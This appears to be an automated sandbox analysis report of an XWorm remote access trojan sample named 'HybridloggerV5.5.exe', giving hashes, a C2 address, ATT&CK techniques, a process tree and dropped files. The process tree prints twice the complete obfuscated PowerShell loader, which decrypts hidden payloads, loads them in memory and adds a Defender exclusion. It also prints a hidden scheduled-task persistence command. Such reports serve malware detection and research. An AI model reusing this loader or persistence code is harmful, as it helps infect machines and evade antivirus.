xworm | 9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

Analysis

max time kernel
123s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
28/02/2025, 05:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HybridloggerV5.5.exe
Size

937KB
MD5

c9314841cdbf8522e9ee925039d3bfb7
SHA1

1b851459626862fdae6bdc0dd30aadf7a0f905ee
SHA256

9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
SHA512

fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
SSDEEP

24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

193.161.193.99:24469

Attributes

Install_directory
%Temp%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2720-53-0x0000025E1BB60000-0x0000025E1BB76000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
25	2720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
744	powershell.exe
4904	powershell.exe
2720	powershell.exe
744	powershell.exe
2720	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	HybridloggerV5.5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
744	powershell.exe
744	powershell.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe
2720	powershell.exe
2720	powershell.exe
2720	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeIncreaseQuotaPrivilege	4904	powershell.exe
Token: SeSecurityPrivilege	4904	powershell.exe
Token: SeTakeOwnershipPrivilege	4904	powershell.exe
Token: SeLoadDriverPrivilege	4904	powershell.exe
Token: SeSystemProfilePrivilege	4904	powershell.exe
Token: SeSystemtimePrivilege	4904	powershell.exe
Token: SeProfSingleProcessPrivilege	4904	powershell.exe
Token: SeIncBasePriorityPrivilege	4904	powershell.exe
Token: SeCreatePagefilePrivilege	4904	powershell.exe
Token: SeBackupPrivilege	4904	powershell.exe
Token: SeRestorePrivilege	4904	powershell.exe
Token: SeShutdownPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeSystemEnvironmentPrivilege	4904	powershell.exe
Token: SeRemoteShutdownPrivilege	4904	powershell.exe
Token: SeUndockPrivilege	4904	powershell.exe
Token: SeManageVolumePrivilege	4904	powershell.exe
Token: 33	4904	powershell.exe
Token: 34	4904	powershell.exe
Token: 35	4904	powershell.exe
Token: 36	4904	powershell.exe
Token: SeIncreaseQuotaPrivilege	4904	powershell.exe
Token: SeSecurityPrivilege	4904	powershell.exe
Token: SeTakeOwnershipPrivilege	4904	powershell.exe
Token: SeLoadDriverPrivilege	4904	powershell.exe
Token: SeSystemProfilePrivilege	4904	powershell.exe
Token: SeSystemtimePrivilege	4904	powershell.exe
Token: SeProfSingleProcessPrivilege	4904	powershell.exe
Token: SeIncBasePriorityPrivilege	4904	powershell.exe
Token: SeCreatePagefilePrivilege	4904	powershell.exe
Token: SeBackupPrivilege	4904	powershell.exe
Token: SeRestorePrivilege	4904	powershell.exe
Token: SeShutdownPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeSystemEnvironmentPrivilege	4904	powershell.exe
Token: SeRemoteShutdownPrivilege	4904	powershell.exe
Token: SeUndockPrivilege	4904	powershell.exe
Token: SeManageVolumePrivilege	4904	powershell.exe
Token: 33	4904	powershell.exe
Token: 34	4904	powershell.exe
Token: 35	4904	powershell.exe
Token: 36	4904	powershell.exe
Token: SeIncreaseQuotaPrivilege	4904	powershell.exe
Token: SeSecurityPrivilege	4904	powershell.exe
Token: SeTakeOwnershipPrivilege	4904	powershell.exe
Token: SeLoadDriverPrivilege	4904	powershell.exe
Token: SeSystemProfilePrivilege	4904	powershell.exe
Token: SeSystemtimePrivilege	4904	powershell.exe
Token: SeProfSingleProcessPrivilege	4904	powershell.exe
Token: SeIncBasePriorityPrivilege	4904	powershell.exe
Token: SeCreatePagefilePrivilege	4904	powershell.exe
Token: SeBackupPrivilege	4904	powershell.exe
Token: SeRestorePrivilege	4904	powershell.exe
Token: SeShutdownPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeSystemEnvironmentPrivilege	4904	powershell.exe
Token: SeRemoteShutdownPrivilege	4904	powershell.exe
Token: SeUndockPrivilege	4904	powershell.exe
Token: SeManageVolumePrivilege	4904	powershell.exe
Token: 33	4904	powershell.exe
Token: 34	4904	powershell.exe
Token: 35	4904	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1984 wrote to memory of 1464	1984	HybridloggerV5.5.exe	88
PID 1984 wrote to memory of 1464	1984	HybridloggerV5.5.exe	88
PID 1984 wrote to memory of 2952	1984	HybridloggerV5.5.exe	90
PID 1984 wrote to memory of 2952	1984	HybridloggerV5.5.exe	90
PID 1464 wrote to memory of 1548	1464	cmd.exe	92
PID 1464 wrote to memory of 1548	1464	cmd.exe	92
PID 2952 wrote to memory of 548	2952	cmd.exe	93
PID 2952 wrote to memory of 548	2952	cmd.exe	93
PID 548 wrote to memory of 2904	548	net.exe	94
PID 548 wrote to memory of 2904	548	net.exe	94
PID 2952 wrote to memory of 744	2952	cmd.exe	97
PID 2952 wrote to memory of 744	2952	cmd.exe	97
PID 744 wrote to memory of 4904	744	powershell.exe	101
PID 744 wrote to memory of 4904	744	powershell.exe	101
PID 744 wrote to memory of 5020	744	powershell.exe	103
PID 744 wrote to memory of 5020	744	powershell.exe	103
PID 5020 wrote to memory of 4624	5020	WScript.exe	104
PID 5020 wrote to memory of 4624	5020	WScript.exe	104
PID 4624 wrote to memory of 1352	4624	cmd.exe	107
PID 4624 wrote to memory of 1352	4624	cmd.exe	107
PID 1352 wrote to memory of 4748	1352	net.exe	108
PID 1352 wrote to memory of 4748	1352	net.exe	108
PID 4624 wrote to memory of 2720	4624	cmd.exe	109
PID 4624 wrote to memory of 2720	4624	cmd.exe	109
PID 1464 wrote to memory of 2336	1464	cmd.exe	119
PID 1464 wrote to memory of 2336	1464	cmd.exe	119
PID 1464 wrote to memory of 920	1464	cmd.exe	120
PID 1464 wrote to memory of 920	1464	cmd.exe	120

C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1548
- - C:\Windows\system32\findstr.exe
    findstr /C:"asd" banned_users.txt
    3⤵
    PID:2336
- - C:\Windows\system32\findstr.exe
    findstr /C:"asd asd" users.txt
    3⤵
    PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:2904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_120_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_120.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4904
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_120.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:5020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_120.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4624
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1352
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:4748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_120.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbbf71e9fb59f80938f09809b160e441

SHA1
8b9a517d846cb9a0a284f77ed88328236a85055f

SHA256
e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

SHA512
90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

Filesize
12KB

MD5
89a22d3791ca38666c8144725a74497d

SHA1
96b672089a3c783e4dd27e8da7c0cc1245d55cfd

SHA256
9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

SHA512
6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

Filesize
910KB

MD5
72ecd938d114e246eeebc8ae430fc2e9

SHA1
9ece59be22ceadcb3951093483cc69a76658801d

SHA256
4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

SHA512
d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jyvgjkel.zfk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\users.txt

Filesize
10B

MD5
bebbe3f3e6a9600be7982006daab2e95

SHA1
bc6ea02ee0160343925db6136ab1a76a314411bb

SHA256
afc1cd0ffdfd94078823c53c72714c91b21b5990d335ef5b2128f613ce3432e5

SHA512
872855b832566763b4d825e985cc518219d7b97d845aff07a76e05e454f707c3245f808515658ff56c879e50e58381ebdf6509681a0d9cf9b8c0147cbb3b6da1

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_120.vbs

Filesize
115B

MD5
38ecd8a0fb1393c7394095882a71f131

SHA1
f17201d2d2e00167e7786766b2da546b5e50c028

SHA256
1ea700303afd0e245e8342593f0da8c65ddad1509fd7b6e4401277079b227d61

SHA512
f377054e2b68b07d39bdf2c9d33ce0565b9b1dbddc3631af7a0d8624fd58df437c3671b507f4942a1a444de7edf86c4b7ab150f21f1807b064e358ebd3645573

Download Submit
memory/744-20-0x000002312D570000-0x000002312D592000-memory.dmp

Filesize
136KB

Download
memory/744-21-0x0000023113370000-0x0000023113378000-memory.dmp

Filesize
32KB

Download
memory/744-22-0x000002312D7C0000-0x000002312D7F8000-memory.dmp

Filesize
224KB

Download
memory/1984-0-0x00007FFFB0C93000-0x00007FFFB0C95000-memory.dmp

Filesize
8KB

Download
memory/1984-1-0x0000000000460000-0x0000000000550000-memory.dmp

Filesize
960KB

Download
memory/2720-53-0x0000025E1BB60000-0x0000025E1BB76000-memory.dmp

Filesize
88KB

Download